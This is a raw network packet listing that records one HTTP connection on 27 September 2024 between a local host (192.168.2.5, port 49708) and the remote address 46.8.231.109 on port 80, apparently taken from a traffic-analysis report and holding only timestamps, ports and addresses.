Sep 27, 2024 00:15:06.069962025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.069994926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.069998980 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.069998980 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.070029974 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.070038080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.070058107 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.070063114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.070085049 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.070111990 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.080415010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.080537081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.080763102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.080826998 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.080882072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.080914974 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.080940008 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.080946922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.080960989 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.080980062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.080988884 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.081011057 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.081013918 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.081043005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.081056118 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.081089020 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.084642887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.084672928 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.084711075 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.084721088 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.084722996 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.084769011 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.084769964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.084810019 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.084820032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.084851980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.084875107 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.084883928 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.084912062 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.084923983 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.084924936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.084975004 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.084975004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085006952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085026026 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085038900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085051060 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085072041 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085078955 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085103989 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085122108 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085154057 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085179090 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085186005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085201025 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085220098 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085226059 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085252047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085266113 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085293055 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085300922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085333109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085351944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085377932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085381031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085414886 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085436106 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085448027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085468054 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085490942 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085638046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085688114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085690022 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085719109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085731030 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085757017 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085763931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085793972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085824013 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085825920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085840940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085854053 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085866928 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085905075 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085907936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085941076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085966110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.085973978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.085983992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086007118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086021900 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086047888 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086055040 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086081982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086097002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086112976 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086126089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086146116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086154938 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086178064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086195946 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086211920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086224079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086240053 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086263895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086291075 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086319923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086323977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086334944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086355925 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086374998 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086388111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086400032 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086420059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086437941 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086452961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086477995 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086484909 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086504936 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086518049 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086540937 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086551905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086560011 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086585045 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086594105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086616039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086626053 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086648941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086658001 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086682081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086694956 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086720943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086721897 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086752892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086765051 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086785078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086798906 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086822987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086823940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086853981 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086869001 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086885929 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086888075 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086918116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086930037 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086947918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.086967945 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.086998940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087002039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087029934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087050915 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087060928 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087069988 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087104082 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087110043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087141991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087156057 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087174892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087193966 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087208033 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087223053 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087255955 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087256908 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087289095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087311983 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087321043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087333918 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087353945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087364912 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087405920 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087408066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087455988 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087455988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087488890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087503910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087521076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087539911 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087553024 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087570906 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087584972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087605953 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087616920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087629080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087649107 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087667942 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087681055 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087692976 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087713003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087727070 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087745905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087758064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087778091 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087796926 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087810040 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087816000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087841988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087860107 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087872982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087892056 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087902069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087917089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087934971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087943077 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.087966919 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.087975979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088010073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088016987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088048935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088066101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088079929 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088094950 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088112116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088128090 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088145018 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088159084 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088182926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088192940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088216066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088236094 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088249922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088263988 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088282108 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088289976 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088315964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088327885 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088347912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088355064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088381052 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088393927 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088408947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088423967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088442087 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088449001 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088475943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088490009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088506937 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088521004 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088538885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.088547945 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.088587046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.156966925 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.157004118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.157037973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.157068968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.157083988 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.157104015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.157104969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.157159090 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.195856094 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.203802109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.370893002 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.370964050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.370963097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371007919 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371032000 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371066093 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371079922 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371109962 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371118069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371150970 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371164083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371184111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371196985 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371217012 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371228933 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371251106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371259928 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371283054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371292114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371315002 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371321917 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371347904 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371356964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371401072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371402025 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371433020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371442080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371465921 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371478081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371505022 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371516943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371551037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371558905 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371582031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371588945 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371623993 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371633053 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371665001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371676922 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371696949 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371701002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371728897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371738911 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371761084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371766090 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371809006 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371813059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371845007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371861935 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371877909 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371891022 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371911049 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.371923923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.371957064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372308016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372340918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372354984 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372383118 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372390032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372417927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372431040 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372462034 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372467995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372500896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372514009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372530937 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372545004 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372564077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372579098 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372596025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372607946 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372627974 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372631073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372661114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372668982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372693062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372709036 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372725010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372729063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372757912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372766018 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372790098 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372802019 CEST	49708	80	192.168.2.5	46.8.231.109
